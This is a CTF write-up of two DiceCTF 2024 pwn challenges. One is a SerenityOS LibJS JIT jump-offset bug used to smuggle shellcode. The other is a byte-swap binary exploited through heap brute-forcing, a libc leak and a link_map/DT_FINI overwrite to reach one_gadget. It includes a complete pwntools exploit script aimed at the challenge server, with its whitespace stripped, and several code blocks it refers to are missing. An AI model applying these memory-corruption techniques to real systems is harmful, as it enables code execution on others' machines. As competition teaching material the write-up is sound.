I played with the Blue Water team in the DiceCTF 2024 Quals. We managed to secure the first place. A huge shoutout and thanks to my awesome teammates for their fantastic teamwork during it!
Below is the writeup for the pwn challenges that I managed to solve.
Pwn
hop
Description
Using 32 bits to encode a short jump is so wasteful… this will surely be better🐞🤓
nc mc.ax 32421
Initial Analysis
In this challenge, we were provided with a zip file containing the Dockerfile used to build the challenge, along with a patch file. Below is the content of the patch file.
The patch targets the JIT (Just-In-Time compilation) code of LibJS in SerenityOS. Examining the patch reveals a significant bug. The intention behind the patch is to replace a relative JMP offset instruction with a relative JMP short offset. However, an issue arises in how the small_offset is calculated. By adding 3 to the offset and then casting it to int8_t, if the result of offset + 3 exceeds INT8_MAX, it leads to an overflow, resulting in a negative offset. Consequently, the JIT-compiled code behaves incorrectly. Instead of jumping forward to the intended destination, the overflow causes a jump to a preceding instruction, disrupting the intended flow of execution.
Solution
Based on the bug we identified, let’s start by setting up our local environment. The first step involves cloning the SerenityOS repository and applying the patch.
Before proceeding to build the js engine, a small adjustment will simplify our debugging process. Navigate to the serenity/Userland/Libraries/LibJS/JIT/Compiler.cpp file and modify the DUMP_JIT_DISASSEMBLY value to 1. This adjustment ensures that whenever we execute JavaScript code using the js engine that triggers JIT compilation, the engine will automatically dump the disassembly of the JIT-compiled code. With this setting enabled, we are now ready to proceed with building the js engine.
1
./Meta/serenity.sh build lagom js
First, we’ll begin by crafting a simple script to examine the JIT-compiled code’s behavior.
Upon analyzing the dumped results, we notice that each return statement triggers a relative JMP instruction to common_exit, which the patch then converts into a jmp short. Observing the disassembly, our goal becomes clear: to extend the jmp short offset when returning 41414141. The presence of return [42424242] in the JIT-compiled code, as mentioned above, indicates that to enlarge the jmp short offset for returning 41414141, we can simply incorporate multiple values to be returned in that line. For instance, altering the script as follows increases the offset.
The offset increment by 0xd upon adding a new constant value to be returned demonstrates a potential approach to exploit the bug. By experimenting with various patterns, I discovered a specific code snippet that successfully triggers the bug.
Upon closer examination, we observed that during the process of returning [41414141], the jmp short instruction becomes corrupted, transforming into jmp short 0x81. This alteration causes the instruction to jump backward. The objective now shifts to adjusting our POC, aiming to redirect the corrupted jmp rel8 destination to a segment of bytecode under our control. The following JavaScript code achieves this by successfully setting the jump destination to bytecode we manipulate.
Notably, the <Block 4+0x7> falls under our control, as it represents part of the hexadecimal encoding of our floating-point parameter (2261634.5098039214, which translates to 0x4141414141414141). We can smuggle our shellcode into the JIT-compiled code. By making the return statement to include additional values that represent our shellcode in floating-point format, we can effectively insert executable code into the JIT process.
What I did here involves smuggling shellcode by appending additional values to the return statement. Specifically, within the <Block 4+0x7>, I did another backward jump that directs execution to the previously smuggled shellcode. For the creation of this smuggled shellcode, I used the script detailed below:
int__cdeclmain(intargc,constchar**argv,constchar**envp){__int64v4;// [rsp+8h] [rbp-18h] BYREF
__int64v5;// [rsp+10h] [rbp-10h] BYREF
unsigned__int64v6;// [rsp+18h] [rbp-8h]
v6=__readfsqword(0x28u);puts(_art);puts(s);while(data[0]){v5=0LL;printf("\n\x1B[31;49;1;4m%s\x1B[0m\n\n\n",data);puts("The sound of \x1B[0;33mgion shoja bells\x1B[0m echoes the impermanence of all things. The color\n""of \x1B[0;33msala flowers\x1B[0m reveals the truth that the prosperous must decline. \x1B[4;33mHowever\x1B[0m! We\n""are the exception:");__isoc99_scanf("%zu %zu",&v4,&v5);clap(v4,v5);}return0;}
The binary’s structure is straightforward. Essentially, it allows for the swapping of bytes within any rw (read-write) area of the binary, specifically relative to the bss section (where data is stored). This byte-swapping capability is the sole interaction allowed, and the program terminates if the value at data[0] is set to NULL.
Solution
Despite the binary’s simplicity, crafting an exploit poses a significant challenge.
Brute-force heap offset
Initially, we can leak any value if we know its offset relative to the data, by exchanging the target_offset with 0x96. The value 0x96 represents the final byte in the data string, indicating that swapping and moving our target value to data[0x96] will result in its display on the prompt.
The primary challenge arises from the fact that the bss area lacks valuable information for leakage, except for the PIE base address. This limitation prompts the exploration of alternative strategies, such as attempting to brute-force the heap offset. Notably, if a viable offset within the heap can be identified, it becomes feasible to trace back to the heap’s top chunk, and we can do more with it later on.
Is brute-forcing the heap offset a feasible strategy? Indeed, it is. Typically, the heap spans an area of 0x21000. Observations indicate that the gap between the bss and heap areas ranges from approximately 0x0XXY000 to 0x1XXY000. Given the heap’s default size exceeds 0x10000, correctly deducing the XX nibble ensures that any Y nibble exist, thus significantly reducing the brute-force effort to roughly 8 bits. This reduction means that the brute-force approach is quite practical.
Leak libc address
Let say that we are abole to brute-force the heap offset and identifying the top chunk, the next question is: what possibilities does this open up? A close examination of the heap chunks in gdb reveals the default layout.
Unfortunately, it does not contain any directly useful values for leakage. However, an intriguing opportunity arises with the potential to corrupt the top chunk size.
Now, consider the scenario where the top chunk size is altered from 0x20550 to merely 0x550 with the swap. It’s observed that triggering a malloc(0x800) call is straightforward via scanf, especially by prefixing our inputted number with numerous leading zeros. What implications would this manipulation have when combined with a malloc(0x800) call triggered by scanf?
Upon inspecting the heap’s state in gdb following our manipulation, we observe the presence of an unsorted bin chunk. This opens the door to leaking a libc address. Having the libc address leads to several exploitation pathways.
Exploitation via link_map
In our approach, we opted for the link_map exploitation technique, as detailed in nobodyisnobody’s article. To effectively trigger the code outlined in glibc’s dl-fini.c, a series of steps are required:
Nullify the link_map->DT_FINI_ARRAY.
Overwrite link_map->l_info[DT_FINI] with an address we control, allowing us to modify the d_un.d_ptr value subsequently.
Adjust link_map->l_Addr and link_map->l_info[DT_FINI]->d_un.d_ptr so the sum of their values will point to our desired function address.
Trigger exit.
Exploring the possibilities with one_gadget, we identified one good gadget.
The next step involves placing the one_gadget address into the link_map. However, it’s important to remember that our ability to write is constrained to swapping bytes. Given this limitation, how can we insert the one_gadget address into the link_map?
A reliable method involves leaking the stack address, then positioning our targeted bytes on the stack through scanf, followed by swapping them into place. However, we discovered this trick quite late in the process and had already secured the flag using our initial approach, which we will outline here.
The one_gadget address consists of 6 bytes, and the higher 3 bytes can be easily written by sourcing them from the libc GOT area. We simply select any libc address present there whose higher 3 bytes match those of our chosen one_gadget across multiple runs.
The 1st lower byte of the one_gadget address is consistently 0x85. Upon examining the memory, we discovered a value within the ldrw area that invariably contains the 0x85 byte.
Regarding the 2nd lower byte of the one_gadget, it is influenced by ASLR. Nonetheless, a thorough memory scan revealed a value in the ldrw area that consistently matches the 2nd lower byte of the one_gadget address across multiple executions.
Unfortunately, for the 3rd lower byte, there is no address that consistently mirrors the one_gadget’s 3rd lower byte. Therefore, we relied on luck :), scanning the ld memory with the swap function in each run, hoping to find a byte in the ld area that could match the 3rd lower byte.
Brute-forcing the heap is took some quite time, and every time we hit it, sometime we failed to find the 3rd byte in the ld area due to the timeout. However, we hit once and we are able to fetch the flag. Below is our full script with detailed comments:
frompwnimport*# Filter ld area to be scanned. Skip addresses that always# contains zero bytes. `out` file example'''
0x7ff7628f0000: 0x0000000000039e80 0x0000000000000000
0x7ff7628f0010: 0x0000000000000000 0x00007ff7627fda10
0x7ff7628f0020 <_dl_signal_exception@got.plt>: 0x00007ff7627fd960 0x00007ff7627fd9b0
0x7ff7628f0030 <_dl_catch_error@got.plt>: 0x00007ff7627fdb30 0x0000000000000000
0x7ff7628f0040 <_rtld_global>: 0x00007ff7628f12e0 0x0000000000000004
0x7ff7628f0050 <_rtld_global+16>: 0x00007ff7628f15a0 0x0000000000000000
...
'''lines=open('out','rb').readlines()ld_rw_base=0x00007ff7628f0000map_offset={}rev_map={}forlineinlines:addr=line.split(b'<')[0].split(b':\t')[0]offset=int(addr,16)-ld_rw_baseval_1=int(line.split(b'\t')[1],16)foridx,valinenumerate(p64(val_1)):ifval!=0:rev_map[val]=1map_offset[offset+idx]=valoffset+=8val_2=int(line.split(b'\t')[2],16)foridx,valinenumerate(p64(val_2)):ifval!=0:rev_map[val]=1map_offset[offset+idx]=valcontext.arch='amd64'context.encoding='latin'context.log_level='INFO'warnings.simplefilter("ignore")local_url="localhost"local_port=5000remote_url="mc.ax"remote_port=31040gdbscript='''
'''defconn():ifargs.LOCAL:r=remote(local_url,local_port)else:r=remote(remote_url,remote_port)returnr# Brute-force heap offsetnum_try=-1whileTrue:num_try+=1print(f'{num_try= }')found=Falsetry:r=conn()# POW solverifnotargs.LOCAL:r.recvuntil(b'work:\n')out=r.recvline().strip()proof=os.popen(out.decode()).readlines()[0].strip()r.sendlineafter(b'solution: ',proof.encode())defclap(v1,v2):r.sendlineafter(b'on:',(str(v1)+' '+str(v2)).encode())defclap_str(v1,v2):r.sendlineafter(b'on:',(v1+' '+v2).encode())defclap_bytes(v1,v2):r.sendlineafter(b'on:',(v1+b' '+v2))# BRUTEFORCE HEAP OFFSET'''
0x075aa98
0x0da8a98
0x1613a98
0x1eeca98
'''curr_heap_offset=0x827a98leak=0x1bctr=0x0# Backtrack to find top_chunk, identified by the leak value is 0x51# (because top chunk size value is 0x20551)whileleak==0x1b:curr_heap_offset-=0x1000print('offset = '+hex(curr_heap_offset))clap(curr_heap_offset,0x96)r.recvuntil('soul!',drop=True)leak=u8(r.recv(1))print('top_chunk found: '+hex(leak))print('at offset = '+hex(curr_heap_offset))found=leak==0x51except:print(f'Failed...')r.close()continueiffound:# Restore swapped value so that top chunk size isn't corrupted yet.clap(curr_heap_offset,0x96)breakelse:r.close()continue# PIE Leakpie_leak=0foriinrange(6):clap(-(0x18-i),0x96)r.recvuntil('soul!',drop=True)pie_leak=pie_leak|(u8(r.recv(1))<<(i*8))clap(-(0x18-i),-(0x18-i))# restore original valueinfo(f'{hex(pie_leak)= }')# Overwrite top chunk third bytes to 0,# resulting in top chunk size become 0x551curr_heap_offset+=0x2print(f'{hex(curr_heap_offset)= }')clap(curr_heap_offset,curr_heap_offset)print(f'Top chunk overwritten to 0x551...')# Trigger malloc in scanf, so that we will have unsorted bin# in the heap, and leak the libc address.clap_str('500','0'*0x500+'500')print(f'Get unsorted bin to heap...')curr_heap_offset+=0x6+0x8leaked_libc=0foriinrange(6):clap(curr_heap_offset+i,0x96)r.recvuntil('soul!',drop=True)leaked_libc=leaked_libc|(u8(r.recv(1))<<(i*8))clap(curr_heap_offset+i,0x96)# restore original valueinfo(f'{hex(leaked_libc)= }')libc_base=leaked_libc-(0x21ac80+96)info(f'{hex(libc_base)= }')info(f'{hex(pie_leak)= }')one_gadget=(libc_base+0xebc85)# Leak dl_resolve to calculate ld_base and link_map addressbase_offset=pie_leak+0x18dl_resolve_got=libc_base+0x21a010dl_offset=dl_resolve_got-base_offsetleaked_ld=0foriinrange(6):clap(dl_offset+i,0x96)r.recvuntil('soul!',drop=True)leaked_ld=leaked_ld|(u8(r.recv(1))<<(i*8))clap(dl_offset+i,0x96)info(f'{hex(leaked_ld)= }')ld_base=leaked_ld-0x15d30info(f'{hex(ld_base)= }')link_map=ld_base+0x3b2e0info(f'{hex(link_map)= }')# Nullify link_map->l_addrl_addr_offset=link_map-base_offsetforiinrange(6):clap(l_addr_offset+i,l_addr_offset+i)print("nullify l_addr")# Nullify link_map->l_info[DT_FINI_ARRAY]dt_fini_array_offset=link_map+0x0110-base_offsetforiinrange(6):clap(dt_fini_array_offset+i,dt_fini_array_offset+i)print("nullify dt_fini")# Overwrite link_map->l_info[DT_FINI] with l_name# We will use the `l_name` stored address as our link_map->l_info[DT_FINI] valuel_name_offset=link_map+0x8-base_offsetdt_fini_offset=link_map+0xa8-base_offsetforiinrange(0x8):clap(dt_fini_offset+i,dt_fini_offset+i)foriinrange(6):clap(l_name_offset+i,dt_fini_offset+i)print("finish overwrite")# Leak link_map->l_info[DT_FINI] value that just got overwrittenleaked_dt_fini=0dt_fini_offset=link_map+0xa8-base_offsetforiinrange(6):clap(dt_fini_offset+i,0x96)r.recvuntil('soul!',drop=True)leaked_dt_fini=leaked_dt_fini|(u8(r.recv(1))<<(i*8))clap(dt_fini_offset+i,0x96)info(f'{hex(leaked_dt_fini)= }')# Set one_gadget in link_map->l_info[DT_FINI]->d_un.d_ptrtarget_offset=leaked_dt_fini+0x8-base_offsetforiinrange(0x8):clap(target_offset+i,target_offset+i)## Set higher 3 bytes, taken from one of the values stored in libc rw areafrom_offset=libc_base+0x21b518-base_offsetforiinrange(3,6):clap(from_offset+i,target_offset+i)print("partial")## Set 1st bytetarget_offset=leaked_dt_fini+0x8-base_offsetclap(ld_base-0x15f8-base_offset,target_offset)print("1st byte")## Set 2nd bytetarget_offset=leaked_dt_fini+0x8+1-base_offsetclap(ld_base+0x3b091-base_offset,target_offset)print("2nd byte")## Search 3rd byteprint('searching last byte')last=(one_gadget>>16)&0xffprint(f'{hex(last)= }')offset=ld_base+0x3a000count=0correct_offset=0forkey,_inmap_offset.items():clap(offset+key-base_offset,0x96)r.recvuntil('soul!',drop=True)temp=r.recvuntil(b'\x1b')if(temp[0]==0x1b)and(len(temp)==1):val=0else:val=temp[0]clap(offset+key-base_offset,0x96)print('count = '+hex(count),f'{hex(key)= }, {hex(last)= }, {hex(val)}')ifval==last:correct_offset=offset+keybreakcount+=1## Set 3rd bytetarget_offset=leaked_dt_fini+0xa-base_offsetclap(correct_offset-base_offset,target_offset)print("3rd byte")# Just to validate that our write is successtarget_offset=leaked_dt_fini+0x8-base_offsettest_valzz=0foriinrange(6):clap(target_offset+i,0x96)r.recvuntil('soul!',drop=True)test_valzz=test_valzz|(u8(r.recv(1))<<(i*8))clap(target_offset+i,0x96)info(f'{hex(one_gadget)= }')info(f'{hex(test_valzz)= }')clap(0,0)r.interactive()